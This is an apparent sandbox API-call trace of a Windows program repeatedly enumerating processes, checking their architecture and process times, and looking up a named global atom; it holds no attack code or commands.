	[0123.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0123.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0123.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0123.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0123.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0123.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0123.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0123.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0123.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0123.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0123.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0123.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0123.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0123.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0123.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0123.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x69c
	[0123.551] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.551] CloseHandle (hObject=0x69c) returned 1
	[0123.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0123.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0123.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x69c
	[0123.551] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.551] CloseHandle (hObject=0x69c) returned 1
	[0123.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0123.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x69c
	[0123.552] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.552] CloseHandle (hObject=0x69c) returned 1
	[0123.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x69c
	[0123.552] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.552] CloseHandle (hObject=0x69c) returned 1
	[0123.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x69c
	[0123.553] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.553] CloseHandle (hObject=0x69c) returned 1
	[0123.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x69c
	[0123.553] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.553] CloseHandle (hObject=0x69c) returned 1
	[0123.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x69c
	[0123.553] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.553] CloseHandle (hObject=0x69c) returned 1
	[0123.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x69c
	[0123.553] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.553] CloseHandle (hObject=0x69c) returned 1
	[0123.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0123.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x69c
	[0123.554] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.554] CloseHandle (hObject=0x69c) returned 1
	[0123.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x69c
	[0123.554] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.554] CloseHandle (hObject=0x69c) returned 1
	[0123.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x69c
	[0123.554] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.554] CloseHandle (hObject=0x69c) returned 1
	[0123.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x69c
	[0123.554] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.554] CloseHandle (hObject=0x69c) returned 1
	[0123.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x69c
	[0123.555] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.555] CloseHandle (hObject=0x69c) returned 1
	[0123.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x69c
	[0123.555] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.555] CloseHandle (hObject=0x69c) returned 1
	[0123.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x69c
	[0123.555] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.555] CloseHandle (hObject=0x69c) returned 1
	[0123.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x69c
	[0123.555] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.555] CloseHandle (hObject=0x69c) returned 1
	[0123.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x69c
	[0123.555] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.555] CloseHandle (hObject=0x69c) returned 1
	[0123.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x69c
	[0123.556] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.556] CloseHandle (hObject=0x69c) returned 1
	[0123.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x69c
	[0123.556] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.556] CloseHandle (hObject=0x69c) returned 1
	[0123.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x69c
	[0123.559] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.559] CloseHandle (hObject=0x69c) returned 1
	[0123.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x69c
	[0123.559] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.560] CloseHandle (hObject=0x69c) returned 1
	[0123.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x69c
	[0123.560] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.560] CloseHandle (hObject=0x69c) returned 1
	[0123.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x69c
	[0123.560] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.560] CloseHandle (hObject=0x69c) returned 1
	[0123.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x69c
	[0123.560] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.560] CloseHandle (hObject=0x69c) returned 1
	[0123.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x69c
	[0123.560] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.560] CloseHandle (hObject=0x69c) returned 1
	[0123.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x69c
	[0123.561] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.561] CloseHandle (hObject=0x69c) returned 1
	[0123.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x69c
	[0123.561] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.561] CloseHandle (hObject=0x69c) returned 1
	[0123.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x69c
	[0123.561] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.561] CloseHandle (hObject=0x69c) returned 1
	[0123.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x69c
	[0123.561] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.561] CloseHandle (hObject=0x69c) returned 1
	[0123.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0123.562] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.562] CloseHandle (hObject=0x69c) returned 1
	[0123.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0123.562] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.563] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0123.563] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0123.563] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.563] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0123.563] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.564] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0123.564] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0123.564] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0123.564] CloseHandle (hObject=0x69c) returned 1
	[0123.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0123.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x69c
	[0123.564] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.564] CloseHandle (hObject=0x69c) returned 1
	[0123.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x69c
	[0123.564] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.564] CloseHandle (hObject=0x69c) returned 1
	[0123.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x69c
	[0123.565] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.565] CloseHandle (hObject=0x69c) returned 1
	[0123.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x69c
	[0123.565] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.565] CloseHandle (hObject=0x69c) returned 1
	[0123.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x69c
	[0123.565] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.565] CloseHandle (hObject=0x69c) returned 1
	[0123.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0123.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0123.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0123.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0123.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0123.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0123.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0123.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0123.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0123.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0123.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0123.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0123.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0123.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0123.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0123.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0123.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0123.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0123.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x69c
	[0123.601] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.601] CloseHandle (hObject=0x69c) returned 1
	[0123.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0123.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0123.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x69c
	[0123.602] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.602] CloseHandle (hObject=0x69c) returned 1
	[0123.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0123.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x69c
	[0123.602] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.602] CloseHandle (hObject=0x69c) returned 1
	[0123.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x69c
	[0123.602] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.602] CloseHandle (hObject=0x69c) returned 1
	[0123.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x69c
	[0123.603] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.603] CloseHandle (hObject=0x69c) returned 1
	[0123.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x69c
	[0123.603] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.603] CloseHandle (hObject=0x69c) returned 1
	[0123.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x69c
	[0123.603] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.603] CloseHandle (hObject=0x69c) returned 1
	[0123.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x69c
	[0123.603] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.603] CloseHandle (hObject=0x69c) returned 1
	[0123.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0123.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x69c
	[0123.604] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.604] CloseHandle (hObject=0x69c) returned 1
	[0123.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x69c
	[0123.604] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.604] CloseHandle (hObject=0x69c) returned 1
	[0123.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x69c
	[0123.604] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.604] CloseHandle (hObject=0x69c) returned 1
	[0123.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x69c
	[0123.604] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.604] CloseHandle (hObject=0x69c) returned 1
	[0123.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x69c
	[0123.605] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.611] CloseHandle (hObject=0x69c) returned 1
	[0123.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x69c
	[0123.612] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.612] CloseHandle (hObject=0x69c) returned 1
	[0123.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x69c
	[0123.612] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.612] CloseHandle (hObject=0x69c) returned 1
	[0123.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x69c
	[0123.612] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.612] CloseHandle (hObject=0x69c) returned 1
	[0123.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x69c
	[0123.612] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.612] CloseHandle (hObject=0x69c) returned 1
	[0123.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x69c
	[0123.613] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.714] CloseHandle (hObject=0x69c) returned 1
	[0123.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x69c
	[0123.715] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.715] CloseHandle (hObject=0x69c) returned 1
	[0123.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x69c
	[0123.715] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.715] CloseHandle (hObject=0x69c) returned 1
	[0123.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x69c
	[0123.715] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.715] CloseHandle (hObject=0x69c) returned 1
	[0123.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x69c
	[0123.716] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.716] CloseHandle (hObject=0x69c) returned 1
	[0123.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x69c
	[0123.716] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.716] CloseHandle (hObject=0x69c) returned 1
	[0123.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x69c
	[0123.716] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.716] CloseHandle (hObject=0x69c) returned 1
	[0123.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x69c
	[0123.717] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.717] CloseHandle (hObject=0x69c) returned 1
	[0123.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x69c
	[0123.717] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.717] CloseHandle (hObject=0x69c) returned 1
	[0123.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x69c
	[0123.717] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.717] CloseHandle (hObject=0x69c) returned 1
	[0123.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x69c
	[0123.717] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.717] CloseHandle (hObject=0x69c) returned 1
	[0123.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x69c
	[0123.718] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.718] CloseHandle (hObject=0x69c) returned 1
	[0123.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0123.718] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.718] CloseHandle (hObject=0x69c) returned 1
	[0123.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0123.718] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.719] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0123.719] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0123.719] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.719] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0123.720] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.720] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0123.720] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0123.720] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0123.720] CloseHandle (hObject=0x69c) returned 1
	[0123.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0123.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x69c
	[0123.720] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.721] CloseHandle (hObject=0x69c) returned 1
	[0123.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x69c
	[0123.721] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.721] CloseHandle (hObject=0x69c) returned 1
	[0123.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x69c
	[0123.721] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.721] CloseHandle (hObject=0x69c) returned 1
	[0123.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x69c
	[0123.721] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.722] CloseHandle (hObject=0x69c) returned 1
	[0123.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x69c
	[0123.722] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.722] CloseHandle (hObject=0x69c) returned 1
	[0123.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0123.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0123.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0123.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0123.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0123.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0123.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0123.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0123.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0123.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0123.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0123.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0123.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0123.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0123.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
